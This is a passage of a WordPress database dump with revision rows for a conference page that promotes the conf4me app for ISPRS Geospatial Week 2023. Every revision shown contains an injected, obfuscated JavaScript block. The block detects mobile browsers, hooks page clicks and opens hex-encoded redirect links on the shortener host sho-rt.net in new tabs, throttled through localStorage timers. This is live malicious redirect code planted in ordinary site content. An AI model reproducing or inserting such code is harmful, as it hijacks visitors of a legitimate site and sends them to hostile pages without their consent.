m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-08-26 21:41:56','2023-08-26 21:41:56','',5417,'https://gsw2023.com/?p=5425',0,'revision','',0),
(5427,1,'2023-08-26 21:45:03','2023-08-26 21:45:03','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<p>https://conference4me.psnc.pl/download/</p>\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-08-26 21:45:03','2023-08-26 21:45:03','',5417,'https://gsw2023.com/?p=5427',0,'revision','',0),
(5428,1,'2023-08-26 21:50:08','2023-08-26 21:50:08','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\n\n<button onclick=\"window.location.href=\'https://w3docs.com\';\">https://conference4me.psnc.pl/download/</p>\n\n\nAfter downloading the app, select ISPRS Geospatial Week 2023\n\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 